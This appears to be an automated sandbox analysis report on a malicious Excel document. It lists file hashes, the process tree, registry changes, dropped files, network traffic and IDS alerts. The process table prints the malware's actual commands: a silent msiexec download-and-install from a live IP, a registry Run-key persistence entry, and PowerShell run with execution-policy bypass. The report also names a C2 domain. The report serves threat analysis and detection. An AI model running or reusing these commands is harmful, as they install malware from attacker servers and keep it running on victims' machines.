| Field | Value |
|---|---|
| File name: | 19d278bfbe851f8d7599e9e682ccc0f77619b905.xls |
| Full analysis: | https://app.any.run/tasks/06020900-ef17-4cdc-b8f2-8d74abdce1e1 |
| Verdict: | Malicious activity |
| Analysis date: | March 21, 2019, 17:13:28 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.ms-excel |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Thu Mar 21 06:44:15 2019, Security: 0 |
| MD5: | E5140EB52558797DBE9FAAB58C78C493 |
| SHA1: | 19D278BFBE851F8D7599E9E682CCC0F77619B905 |
| SHA256: | 63522E00181E6B8D9AE8BFD51F7DF8F8EBD0F42323E22047269DF9C7A71C9B6D |
| SSDEEP: | 1536:7Kpb8rGYrMPelwhKmFV5xtezEsgrdg8j/4q09wsRnyKinolB0IdludN7VaLyIc+V:7Kpb8rGYrMPelwhKmFV5xtezEsgrdgUI |
| Extension | File type (TrID) |
|---|---|
| .xls | Microsoft Excel sheet (78.9) |

| Property | Value |
|---|---|
| Author: | Microsoft Office |
| LastModifiedBy: | 1 |
| Software: | Microsoft Excel |
| CreateDate: | 2018:12:19 10:42:12 |
| ModifyDate: | 2019:03:21 06:44:15 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Company: | Microsoft Corporation |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | |
| HeadingPairs: | |
| PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version |
|---|---|---|---|---|---|---|---|---|---|---|
| 264 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Excel | 0 | 14.0.6024.1000 |
| 560 | reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega" /f | C:\Windows\system32\reg.exe | | cmd.exe | admin | Microsoft Corporation | MEDIUM | Registry Console Tool | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 1008 | msiexec.exe RETURN=185 /i http://169.239.128.104/alg /q ksw='%TEMP%' | C:\Windows\system32\msiexec.exe | — | EXCEL.EXE | admin | Microsoft Corporation | MEDIUM | Windows® installer | 0 | 5.0.7600.16385 (win7_rtm.090713-1255) |
| 2032 | powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 1 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2120 | "C:\Windows\Installer\MSI9F57.tmp" | C:\Windows\Installer\MSI9F57.tmp | | msiexec.exe | admin | hepsu burda | MEDIUM | hepsu burda Application | 0 | 1.0.2.1 |
| 2848 | "C:\Users\admin\AppData\Local\Temp\nsvA06F.tmp\nsA080.tmp" "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Users\admin\AppData\Local\Temp\nsvA06F.tmp\nsA080.tmp | — | MSI9F57.tmp | admin | | MEDIUM | | 0 | |
| 3272 | cmd.exe /C reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 %temp%\xmlparse.dll, sega" /f | C:\Windows\system32\cmd.exe | — | rundll32.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3768 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | | services.exe | SYSTEM | Microsoft Corporation | SYSTEM | Windows® installer | 0 | 5.0.7600.16385 (win7_rtm.090713-1255) |
| 3876 | "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Windows\system32\cmd.exe | — | nsA080.tmp | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 4020 | cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1 | C:\Windows\system32\cmd.exe | — | rundll32.exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| PID | Process | Key | Operation | Name | Value |
|---|---|---|---|---|---|
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems | write | &"3 | 2622330008010000010000000000000000000000 |
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | Off |
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | On |
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel | write | MTTT | 0801000040FB497409E0D40100000000 |
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems | delete value | &"3 | 2622330008010000010000000000000000000000 |
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems | delete key | | |
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency | delete key | | |
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 0 |
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 1 |
| 264 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\F9080 | write | F9080 | |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8A16.tmp.cvr | — | — | — |
| 3768 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF7E30257C4D44AD00.TMP | — | — | — |
| 2032 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IK7WO6F0WU6R04SGA89J.temp | — | — | — |
| 4088 | rundll32.exe | C:\Users\admin\AppData\Local\Temp\enu.ps1 | text | — | — |
| 2120 | MSI9F57.tmp | C:\Users\admin\AppData\Local\Temp\xmlparse.dll | executable | — | — |
| 3768 | msiexec.exe | C:\Windows\Installer\MSI9F57.tmp | executable | — | — |
| 3768 | msiexec.exe | C:\Windows\Installer\MSI9A91.tmp | executable | — | — |
| 3768 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat | dat | — | — |
| 2120 | MSI9F57.tmp | C:\Users\admin\AppData\Local\Temp\nsvA06F.tmp\System.dll | executable | B0C77267F13B2F87C084FD86EF51CCFC | A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77 |
| 3768 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Cookies\index.dat | dat | D7A950FEFD60DBAA01DF2D85FEFB3862 | 75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 3768 | msiexec.exe | GET | 200 | 169.239.128.104:80 | http://169.239.128.104/alg | ZA | executable | 396 Kb | suspicious |
| 4088 | rundll32.exe | POST | 200 | 179.43.156.37:80 | http://cdnavupdate.icu/jquery/jquery.php | CH | text | 140 b | malicious |

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3768 | msiexec.exe | 169.239.128.104:80 | — | Zappie Host LLC | ZA | suspicious |
| 4088 | rundll32.exe | 179.43.156.37:80 | cdnavupdate.icu | Private Layer INC | CH | suspicious |

| Domain | IP | Reputation |
|---|---|---|
| cdnavupdate.icu | | malicious |

| PID | Process | Class | Message |
|---|---|---|---|
| 3768 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
| 3768 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
| 1072 | svchost.exe | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .icu Domain |
| 4088 | rundll32.exe | Potentially Bad Traffic | ET INFO HTTP POST Request to Suspicious *.icu domain |